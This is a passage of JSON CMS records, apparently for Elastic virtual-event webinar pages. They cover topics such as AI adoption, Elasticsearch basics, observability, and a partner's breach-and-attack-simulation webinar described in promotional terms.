page)\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2025-01-21T17:00:00.000Z","presenter":["bltc8657c30b2f6ead7","blt6c4ec0e5094eb59e","blt91aefbbce7bce7d9","bltb3d99bcb2422e212"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"CIOs and a CTO share advice and lessons learned on their AI adoption journeys","seo_description_l10n":"Explore the AI adoption journeys of IT leaders from Adobe, Comcast, and Elastic as they discuss challenges and opportunities in this engaging Fast Company webinar. ","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[],"tags_region":[{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Future-proof your business: How to lead, not lag on your journey to AI adoption","token":"kNa0NwTr19","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-06T18:35:41.663Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/future-proof-your-business-ai","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"cH7Lc9DGQDQ93w5aTjy1m7","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-07T20:09:48.230Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt52f065ec67bbab1e","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-02-05T19:15:26.397Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Eliminating gaps in security","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eJoin us for an enlightening webinar with Proficio, an Elastic Verified MSP, as it unveils its cutting-edge approach of leveraging breach and attack simulations. Proficio's methodology aligns with MITRE ATT\u0026amp;CK frameworks and adheres to best practices that fortify gaps in threat detection strategies.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cp\u003eLearn firsthand from Proficio's engineering experts about this unique attack simulation methodology that:\u003c/p\u003e\u003cul\u003e\u003cli\u003eTests and significantly bolsters your cyber defenses\u003c/li\u003e\u003cli\u003eEnsures your organization remains impervious to evolving threats\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eThis session is a must-watch for all partners and customers looking to elevate their security posture and safeguard their clients with unparalleled proficiency.\u003c/p\u003e","presentation_date":"2025-01-28T19:14:37.000Z","presenter":["blt719388621bdf51c8","blt8325e0def59d5822"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Eliminating gaps in security","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-05T19:15:52.417Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/eliminating-gaps-in-security","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-06T19:48:26.849Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltcefa7d9c7c2427de","_version":7,"locale":"en-us","ACL":{},"created_at":"2025-01-28T22:43:25.210Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Accelerating action with AI","paragraph_l10n":"\u003cp\u003eSponsored by Kyndryl, Microsoft, and Elastic\u003c/p\u003e","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"16474","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":"\u003cp\u003eEurope \u0026amp; India: March 18, 2025, at 2:00 p.m. CET / 6:30 p.m. IST\u003c/p\u003e\u003cp\u003eAmericas: March 18, 2025, at 1:00 p.m. PST / 4:00 p.m. EST\u003c/p\u003e\u003cp\u003eAsia Pacific: March 18, 2025, at 11:00 a.m. SGT / 2:00 p.m. AEDT\u003c/p\u003e"},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eIndustry leaders from Kyndryl, Microsoft, and Elastic join us for an insightful webinar on how AI is revolutionizing business operations and promoting diversity in tech. Our speakers will discuss AI-driven solutions that accelerate decision-making, optimize processes, and enhance customer experiences, fostering an inclusive culture that empowers all voices. Discover how advocating for diversity not only enriches collaboration but also drives innovation and impactful outcomes.\u003c/p\u003e\u003ch4\u003eAdditional resource\u003c/h4\u003e\u003cp\u003eExcited about AI and want to get started? Visit our \u003ca href=\"https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.ec-azure-pp?ocid=microsoft-elastic-Kyndryl-Accelerating-Action\" target=\"_self\"\u003eAzure Marketplace listing\u003c/a\u003e.\u003c/p\u003e","presentation_date":"2025-03-18T21:00:00.000Z","presenter":["blt3d8ed5edce9ead9c","blt5ac86a82351a5aa1","blt0d1be058a59e7827","blt3323f40b67886e38"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Accelerating action with AI","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-04T01:10:30.503Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/microsoft-elastic-kyndryl-accelerating-action","video_type":["blt321a8ac0bef65269"],"vidyard":{"uuid":"","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-04T01:10:34.698Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt5db22f9ec67c56da","_version":56,"locale":"en-us","ACL":{},"created_at":"2021-10-18T16:43:56.847Z","created_by":"blta4706a7723d386a4","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":"Placement #4","description":"This session is perfect for users that are new to Elasticsearch or users that want to see features like the frozen tier and runtime fields in action. We’ll cover getting started which includes deploying, managing, and analyzing data in Elasticsearch."},"hour_time_format":false,"image":{"uid":"blta8fb788f1106a523","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T05:11:15.851Z","updated_at":"2018-10-11T05:11:15.851Z","content_type":"image/jpeg","file_size":"45101","filename":"getting-started-elasticsearch.jpg","title":"getting-started-elasticsearch.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-03-19T10:37:07.704Z","user":"blt8288fbcbd8c9dce4"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta8fb788f1106a523/5bbedb737fe6399a7f31fbcf/getting-started-elasticsearch.jpg"},"main_header":{"topic_heading_l10n":"","title_l10n":"Getting started with Elasticsearch","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"16474","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":"","cta_title_l10n":""},"message_for_attendee":"","note":{"paragraph_l10n":"\u003cp\u003e\u003cstrong\u003eJoin the upcoming Getting started with Elasticsearch session in your timezone:\u003c/strong\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003eAmericas: Thursday, April 10, 2025, at 9 a.m. PDT, 12 p.m. EDT\u003c/li\u003e\u003cli\u003eEurope \u0026amp; India: Thursday, \u003cspan\u003e\u003c/span\u003eApril 10, 2025, at 11 a.m. CEST, 2:30 p.m. IST\u003c/li\u003e\u003cli\u003e\u003cp\u003eAsia Pacific: Thursday, \u003cspan\u003e\u003c/span\u003eApril 10, 2025, at 11 a.m. SGT, 1 p.m. AEST\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eWhat is Elasticsearch?\u003c/p\u003e\u003cp\u003eElasticsearch is a distributed, RESTful search and analytics engine capable of addressing a growing number of use cases. As the heart of the free and open ELK or Elastic Stack, it securely stores your data for lightning fast search, fine‑tuned relevancy, and powerful analytics that scale with ease.\u003c/p\u003e\u003cp\u003eThis session is perfect for users that are new to Elasticsearch or users that want to see new capabilities in action. We’ll cover getting started, which includes deploying, managing, and analyzing data in Elasticsearch.\u003c/p\u003e\u003ch4\u003eGetting started with Elasticsearch\u0026nbsp;covers:\u003c/h4\u003e\u003cul\u003e\u003cli\u003eFollowing along the demo by launching a free trial on Elasticsearch Service\u003c/li\u003e\u003cli\u003eAdding, updating, and managing data through both CRUD REST APIs and UI\u003c/li\u003e\u003cli\u003eConfiguring fields on the fly with basic text analysis including tokenization and filtering\u003c/li\u003e\u003cli\u003eBasic search queries\u003c/li\u003e\u003cli\u003eAggregations: The faceting and analytics workhorse of Elasticsearch\u003c/li\u003e\u003cli\u003eQuerying geo-spatial data\u003c/li\u003e\u003cli\u003eFun with analyzers\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional Resources:\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eFree trial:\u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration\"\u003e\u003cspan style='font-size: 11pt;'\u003e Elastic Cloud\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://info.elastic.co/rs/813-MAM-392/images/Demo_Script.txt\"\u003e\u003cspan style='font-size: 11pt;'\u003eDemo_Script.txt\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://info.elastic.co/rs/813-MAM-392/images/2019-michelin-restaurants.csv\"\u003e\u003cspan style='font-size: 11pt;'\u003eMichelin restaurants .csv file\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://info.elastic.co/rs/813-MAM-392/images/2019-michelin-resturants.txt\"\u003e\u003cspan style='font-size: 11pt;'\u003eMichelin restaurants .txt file\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eRead the\u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html\"\u003e\u003cspan style='font-size: 11pt;'\u003e Elasticsearch documentation\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/downloads/elasticsearch\"\u003e\u003cspan style='font-size: 11pt;'\u003eDownload Elasticsearch\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2025-04-10T16:00:00.000Z","presenter":["blt59e7f7049d793705"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Getting Started with Elasticsearch","seo_description_l10n":"Elasticsearch is an open-source distributed, RESTful search and analytics engine capable of solving a growing number of use cases.","seo_keywords_l10n":"elasticsearch, open source, getting started","seo_image":{"uid":"blt415c7141d8fb9943","created_by":"blt5280857d9e24912bc99a2478","updated_by":"blt5280857d9e24912bc99a2478","created_at":"2020-07-22T21:17:02.723Z","updated_at":"2020-07-22T21:17:02.723Z","content_type":"image/jpeg","file_size":"93520","filename":"elasticsearch_screenshot_-_facebook_ad.jpg","title":"elasticsearch_screenshot_-_facebook_ad.jpg","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-22T21:17:22.269Z","user":"blt5280857d9e24912bc99a2478"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt415c7141d8fb9943/5f18accec0cdfc39bd77aa79/elasticsearch_screenshot_-_facebook_ad.jpg"},"noindex":false},"tags":["started","elasticsearch","video"],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"bltf4c15a435ded5722","ACL":{},"created_at":"2021-04-13T17:54:31.202Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"europe","label_l10n":"Europe","tags":[],"title":"Europe","updated_at":"2021-04-13T17:54:31.202Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-10T12:13:00.412Z","user":"blt3e52848e0cb3c394"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"bltdabf9ea82c489dad","ACL":{},"created_at":"2023-06-27T17:09:23.025Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"india","label_l10n":"India","tags":[],"title":"India","updated_at":"2023-06-27T17:09:23.025Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-27T17:09:25.693Z","user":"blt36e890d06c5ec32c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"title":"Getting started","label_l10n":"Getting started","keyword":"getting-started","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt30953f4176054d3f","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:25.148Z","updated_at":"2020-06-17T03:37:25.148Z","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:25.148Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-07T18:03:25.028Z","user":"blt36e890d06c5ec32c"}}],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Getting started with Elasticsearch - Live","token":"j0inhskxhk","translated_date_l10n":"","translated_time_l10n":"11:00am CET","updated_at":"2025-01-31T15:10:54.377Z","updated_by":"blt417fc94cb7c64d7d","url":"/virtual-events/getting-started-elasticsearch-live","video_type":["blt321a8ac0bef65269"],"vidyard":{"uuid":"","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-09T20:02:23.359Z","user":"blt7ee4b4a4026b9c0b","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltd3acdef08d556348","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-01-29T02:57:47.773Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Introduction to Elastic Observability: Built for the future with Search AI","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"16474","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":"\u003cp\u003e11:00 a.m. SGT / 1:00 p.m. AEST\u003c/p\u003e\u003cp\u003e11:00 a.m. CEST / 10:00 a.m. GMT / 2:30 p.m. IST\u003c/p\u003e\u003cp\u003e9:00 a.m. PDT / 12:00 p.m. EDT\u003c/p\u003e"},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eAre you ready for the next generation of observability? Find out how Elastic Observability delivers simplified onboarding and automated insights to help you detect and resolve issues faster. Take advantage of our comprehensive visibility powered by our Search AI. This webinar will cover all of Elastic Observability's core capabilities (logging, metrics, APM, synthetic monitoring, profiling) along with how to apply generative AI and SLOs on our unified platform.\u003c/p\u003e\u003cp\u003eWe'll also review how Elastic Observability future-proofs your organization and how customers are seeing real and measurable benefits today. Find out you can increase operational efficiency and team performance in this fast-paced webinar introducing Elastic Observability.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eIn-depth demonstration of Elastic Observability's capabilities\u003c/li\u003e\u003cli\u003eHow Elastic Observability delivers improvements for IT operations and a better customer experience\u003c/li\u003e\u003cli\u003eHow to future-proof your observability\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/virtual-events/live-elastic-observability-demo\"\u003eHands-on Elastic Observability demo\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/cloud/observability-trial-overview\"\u003eElastic cloud registration\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/lp/observability-maturity-assessment\" target=\"_self\"\u003eObservability maturity assessment\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2025-03-13T17:00:00.000Z","presenter":["blt6595654c09e95d22","blt29599372767963e8"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Introduction to Elastic Observability: Build for the future with Search AI","seo_description_l10n":"Find out why the next generation of observability will require a new era of speed, scale, and simplicity: Elastic Observability. From open standards to simplified onboarding and automated insights, Elastic helps you detect and resolve issues, faster. Watch this webinar to learn more. ","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt